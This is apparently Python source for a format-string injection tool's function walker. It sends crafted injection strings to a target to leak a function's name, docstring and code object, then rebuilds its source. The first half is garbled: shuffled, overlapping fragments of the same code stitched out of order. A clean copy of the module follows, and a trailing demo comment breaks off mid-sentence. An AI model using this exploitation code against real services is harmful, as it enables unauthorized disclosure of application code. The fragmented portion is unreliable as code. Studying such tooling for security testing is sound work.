FailedInjectionWalker) from .name_injection_walker import (", "this attribute will remain as ``None``. \"\"\" return self._code_walker @property def name_walker( self", "walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value", "' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting", "# exact argument names could not be reversed for below signature def {code_obj.co_name}(*args,", "import ( CodeType, FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker import", "None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object from string ' f'{walker.injection_str}')", "self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code +=", ") -> Optional[str]: \"\"\"The source code that this walker recovered from the target.\"\"\"", "our own signature return f\"\"\"\\ # exact argument names could not be reversed", "self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result", "Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value)", "f'Expected a name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return", "recovered from the target. 
This attribute will only be populated after a call", "will attempt to recover the source code from a function, via access to", "return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a", "yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\"", ") -> Optional[str]: \"\"\"The decompiled function's signature, if one was retrieved.\"\"\" return self._signature", "attribute will only be populated after a call to :func:`walk`. If the call", "f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def", "src_code( self ) -> Optional[str]: \"\"\"The source code that this walker recovered from", "will remain as ``None``. \"\"\" return self._code_walker @property def name_walker( self ) ->", "walker recovered from the target.\"\"\" return self._src_code @property def signature( self ) ->", "the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is", "\"\"\"The decompiled function's signature, if one was retrieved.\"\"\" return self._signature def walk( self", "\"\"\"The code object that this walker recovered from the target. This attribute will", "= [f' {line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code =", "return src_lines = ([] if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = [f'", "self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\", "if walker is None: yield FailedInjectionWalker.msg( 'No matching walker found for injection response", ".abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import (", "class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will attempt to recover", "{doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker = walker", "walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk()", "DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def", "sub_walker if walker.code_obj is None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to", "AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker", "below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return f'Injected", "for a function. This module will attempt to recover the source code from", "from a function, via access to its ``__code__`` attribute. \"\"\" INJECTION_RE = None", "be populated after a call to :func:`walk`. 
If the call to ``walk()`` cannot", "result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection", "import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will", "walker is None: yield FailedInjectionWalker.msg( 'No matching walker found for injection response '", "INJECTION_RE = None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__( self )", "own signature return f\"\"\"\\ # exact argument names could not be reversed for", "yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection ' f'{name_injection}') return", "_walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r'", ".code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import (", "' 'attribute; something is terribly wrong...') return for sub_walker in walker.walk(): yield sub_walker", "( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a", "= None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that", "**kwargs):\"\"\" def __str__( self ) -> str: return f'Injected function object with string", "return self._src_code @property def signature( self ) -> Optional[str]: \"\"\"The decompiled function's signature,", "docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\"", "-> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection)", "func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: #", "not be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self )", "reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str:", "string.\"\"\" return self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The source code", "yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield", "then this attribute will remain as ``None``. \"\"\" return self._code_walker @property def name_walker(", "' f'{name_injection}') return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg(", "string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code is None else walker.src_code.splitlines())", "access to its ``__code__`` attribute. 
\"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+", "if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line in", "-> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection)", "signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return f'Injected function", "\"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except", "{line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if", "self._code_walker @property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used to recover this", "class.\"\"\" from inspect import ( signature as inspect_signature) from types import ( CodeType,", "this walker recovered from the target.\"\"\" return self._src_code @property def signature( self )", "[f' {line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n'", "could not be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self", "from typing import ( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker", "signature return f\"\"\"\\ # exact argument names could not be reversed for below", "to recover injection response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result)", "' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker = walker @staticmethod", "read __name__ of function via injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result)", "'Unable to read __name__ of function via injection ' f'{name_injection}') return walker =", "result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when sending", "response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is", "None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection ' f'{name_injection}')", "self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function", "read __doc__ of function via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result)", "Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from", "``None``. \"\"\" return self._code_walker @property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used", "str: \"\"\"Get a function signature from a code object. 
See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try:", "https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:'", "import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for", "self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None", "walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk()", "def signature( self ) -> Optional[str]: \"\"\"The decompiled function's signature, if one was", "DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker):", "a call to :func:`walk`. If the call to ``walk()`` cannot recover the object,", "self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield", "{walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker def _walk_docstring( self )", "-> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property", "inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature return f\"\"\"\\", "f'Expected a doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return", "source code that this walker recovered from the target.\"\"\" return self._src_code @property def", "via injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker):", "def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered", "Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker)", "__code__ ' 'attribute; something is terribly wrong...') return for sub_walker in walker.walk(): yield", "self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default:", "when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker", "Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if", "walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name", "= walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\"", "successfully recover code object from string ' f'{walker.injection_str}') return src_lines = ([] if", "Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered from the target. 
This attribute", "= self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of", "recover code object from string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code", "yield FailedInjectionWalker.msg( 'No matching walker found for injection response ' f'{raw_result}') return elif", "populated after a call to :func:`walk`. If the call to ``walk()`` cannot recover", "\\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str]", "self._src_code: Optional[str] = None self._signature: Optional[str] = None @property def code_walker( self )", "only be populated after a call to :func:`walk`. If the call to ``walk()``", "in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection)", "from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection", "function via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker,", "walker.walk(): yield sub_walker if walker.code_obj is None or walker.src_code is None: yield FailedInjectionWalker.msg(", "def __str__( self ) -> str: return f'Injected function object with string {self._injection_str}'", "wrong...') return for sub_walker in walker.walk(): yield sub_walker if walker.code_obj is None or", "a name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield", "inspect import ( signature as inspect_signature) from types import ( CodeType, FunctionType) from", "self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The source code that this", "result is None: yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function via injection", "0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker", ".name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module", "via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker):", "names could not be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__(", "from inspect import ( signature as inspect_signature) from types import ( CodeType, FunctionType)", "function. 
This module will attempt to recover the source code from a function,", "got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker def _walk_docstring( self", "return yield from walker.walk() self._name_walker = walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]:", "None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str]", "This module will attempt to recover the source code from a function, via", "line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code", "name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable", "= f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to", "self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] =", "to recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self ) ->", "self._signature: Optional[str] = None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code", "_walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r'", "try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError:", ".+ at 0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None", "= None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code:", "' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg(", "yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__}", "attempt to recover the source code from a function, via access to its", "call to ``walk()`` cannot recover the object, then this attribute will remain as", "CodeType, FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker)", "when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker", "walker.walk() self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get", "walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object from string", "yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function via injection ' f'{doc_string_injection}') return", "walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line in src_lines]", "a function. 
This module will attempt to recover the source code from a", "-> NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker @property def", "after a call to :func:`walk`. If the call to ``walk()`` cannot recover the", "f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker def _walk_docstring(", "import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker)", "for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value:", "the source code from a function, via access to its ``__code__`` attribute. \"\"\"", ") -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result =", "is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection '", "FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from", "yield FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__}", "name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from", "doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable", "to read __doc__ of function via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection,", "object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return", "self ) -> Optional[str]: \"\"\"The source code that this walker recovered from the", "self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result =", "yield FailedInjectionWalker.msg( 'Unable to recover injection response from string ' f'{raw_result}') return walker", ".failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker", "self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection", "walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines)", "None: yield FailedInjectionWalker.msg( 'No matching walker found for injection response ' f'{raw_result}') return", "``__code__`` attribute. 
\"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def", "raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover injection", "' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker def", "if walker.code_obj is None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully", "-> str: \"\"\"Get a function signature from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\"", "\"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result", "FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will attempt to recover the", "f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read", "signature, if one was retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]:", "{type(walker)} when injecting function __code__ ' 'attribute; something is terribly wrong...') return for", "None self._signature: Optional[str] = None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The", "if result is None: yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function via", "( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from", "of the FunctionInjectionWalker class.\"\"\" from inspect import ( signature as inspect_signature) from types", "recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self ) ->", "decompiled function's signature, if one was retrieved.\"\"\" return self._signature def walk( self )", "instead') return yield from walker.walk() self._name_walker = walker def _walk_docstring( self ) ->", "self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker)", "None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object", "( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker)", "code that this walker recovered from the target.\"\"\" return self._src_code @property def signature(", ") -> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\" return self._docstring_walker", "a doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield", "attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg(", "\"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self", "def src_code( self ) -> Optional[str]: \"\"\"The source code that this walker recovered", "= f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self", "self ) -> DocStringInjectionWalker: 
\"\"\"Walker used to recover this function's __doc__ string.\"\"\" return", "Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker", "= self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker", "\"\"\"Injection walker for a function. This module will attempt to recover the source", "__extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\", "from string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code is None else", "code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function signature from a code", "= self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching walker found", "= inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature return", "def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return f'Injected function object", "code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered from", "code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable", "@property def src_code( self ) -> Optional[str]: \"\"\"The source code that this walker", "not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection} '", "this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker", "-> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered from the target. This", "was retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name()", "def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function signature from a", "\"\"\"Walker used to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code(", "walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection", "the target. This attribute will only be populated after a call to :func:`walk`.", "FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ ' 'attribute; something is terribly wrong...')", ") -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker:", "( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will attempt", "See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def", "recovered from the target.\"\"\" return self._src_code @property def signature( self ) -> Optional[str]:", "this walker recovered from the target. This attribute will only be populated after", ":func:`walk`. 
from inspect import (
    signature as inspect_signature)
from types import (
    CodeType,
    FunctionType)
from typing import (
    Iterator,
    Optional)

from .abstract_injection_walker import (
    AbstractInjectionWalker)
from .code_object_injection_walker import (
    CodeObjectInjectionWalker)
from .doc_string_injection_walker import (
    DocStringInjectionWalker)
from .failed_injection_walker import (
    FailedInjectionWalker)
from .name_injection_walker import (
    NameInjectionWalker)


class FunctionInjectionWalker(AbstractInjectionWalker):
    """Injection walker for a function.

    This walker attempts to recover the source code from a function, via
    access to its ``__code__`` attribute.

    """

    INJECTION_RE = None
    RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>'

    def __extra_init__(
        self
    ) -> None:
        self._code_walker: Optional[CodeObjectInjectionWalker] = None
        self._name_walker: NameInjectionWalker = \
            self.empty_instance(NameInjectionWalker)
        self._docstring_walker: DocStringInjectionWalker = \
            self.empty_instance(DocStringInjectionWalker)
        self._src_code: Optional[str] = None
        self._signature: Optional[str] = None

    @property
    def code_walker(
        self
    ) -> Optional[CodeObjectInjectionWalker]:
        """The code object that this walker recovered from the target.

        This attribute will only be populated after a call to :func:`walk`.
        If the call to ``walk()`` cannot recover the object, then this
        attribute will remain as ``None``.

        """
        return self._code_walker

    @property
    def name_walker(
        self
    ) -> NameInjectionWalker:
        """Walker used to recover this function's __name__."""
        return self._name_walker

    @property
    def docstring_walker(
        self
    ) -> DocStringInjectionWalker:
        """Walker used to recover this function's __doc__."""
        return self._docstring_walker

    @property
    def src_code(
        self
    ) -> Optional[str]:
        """The source code that this walker recovered from the target."""
        return self._src_code

    @property
    def signature(
        self
    ) -> Optional[str]:
        """The decompiled function's signature, if one was retrieved."""
        return self._signature

    def walk(
        self
    ) -> Iterator[AbstractInjectionWalker]:
        yield from self._walk_name()
        if self._name_walker.value in self._engine.function_blacklist:
            return
        self._engine.function_blacklist.add(self._name_walker.value)

        yield from self._walk_docstring()

        code_obj_injection = f'{self._injection_str}.__code__'
        raw_result = self._harness.send_injection(code_obj_injection)
        if raw_result is None:
            yield FailedInjectionWalker.msg(
                'Unable to recover injection response from string '
                f'{raw_result}')
            return

        walker = self.next_walker(code_obj_injection, raw_result)
        if walker is None:
            yield FailedInjectionWalker.msg(
                'No matching walker found for injection response '
                f'{raw_result}')
            return
        elif not isinstance(walker, CodeObjectInjectionWalker):
            yield FailedInjectionWalker.msg(
                f'Got {type(walker)} when injecting function __code__ '
                'attribute; something is terribly wrong...')
            return

        for sub_walker in walker.walk():
            yield sub_walker

        if walker.code_obj is None or walker.src_code is None:
            yield FailedInjectionWalker.msg(
                'Unable to successfully recover code object from string '
                f'{walker.injection_str}')
            return

        src_lines = ([] if walker.src_code is None
                     else walker.src_code.splitlines())
        indented_src_lines = [f'    {line}' for line in src_lines]
        self._signature = self.__class__.code_obj_to_signature(
            walker.code_obj)
        self._src_code = f'{self._signature}\n'
        if self._docstring_walker.value:
            self._src_code += f'    """{self._docstring_walker.value}"""\n'
        self._src_code += '\n'.join(indented_src_lines)

        yield self

    def _walk_name(
        self
    ) -> Iterator[AbstractInjectionWalker]:
        """Recover the function's __name__ attribute."""
        name_injection = f'{self._injection_str}.__qualname__!r'
        result = self._harness.send_injection(name_injection)
        if result is None:
            yield FailedInjectionWalker.msg(
                'Unable to read __name__ of function via injection '
                f'{name_injection}')
            return

        walker = self.next_walker(name_injection, result)
        if not isinstance(walker, NameInjectionWalker):
            yield FailedInjectionWalker.msg(
                f'Expected a name walker when sending {name_injection} '
                f'but got {walker.__class__.__qualname__} instead')
            return

        yield from walker.walk()
        self._name_walker = walker

    def _walk_docstring(
        self
    ) -> Iterator[AbstractInjectionWalker]:
        """Recover the function's __doc__ attribute."""
        doc_string_injection = f'{self._injection_str}.__doc__!r'
        result = self._harness.send_injection(doc_string_injection)
        if result is None:
            yield FailedInjectionWalker.msg(
                'Unable to read __doc__ of function via injection '
                f'{doc_string_injection}')
            return

        walker = self.next_walker(doc_string_injection, result)
        if not isinstance(walker, DocStringInjectionWalker):
            yield FailedInjectionWalker.msg(
                f'Expected a doc walker when sending {doc_string_injection} '
                f'but got {walker.__class__.__qualname__} instead')
            return

        yield from walker.walk()
        self._docstring_walker = walker

    @staticmethod
    def code_obj_to_signature(
        code_obj: CodeType
    ) -> str:
        """Build a function signature from a code object.

        See:
            https://stackoverflow.com/a/56761306/5094008

        """
        try:
            func = FunctionType(code_obj, {})
            arg_sequence = inspect_signature(func)
            return f'def {code_obj.co_name}{arg_sequence}:'
        except TypeError:
            # build our own signature
            return f"""\
# exact argument names could not be reversed for below signature
def {code_obj.co_name}(*args, **kwargs):"""
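# --- Illustrative sketch (not part of the module above) ---
# The core trick in code_obj_to_signature() is wrapping a bare code object
# in a FunctionType so that inspect.signature() can read its parameters
# back out. The minimal, self-contained demo below shows that same
# technique in isolation; the names `_demo_code_obj_to_signature` and
# `greet` are hypothetical and exist only for this sketch. Note that
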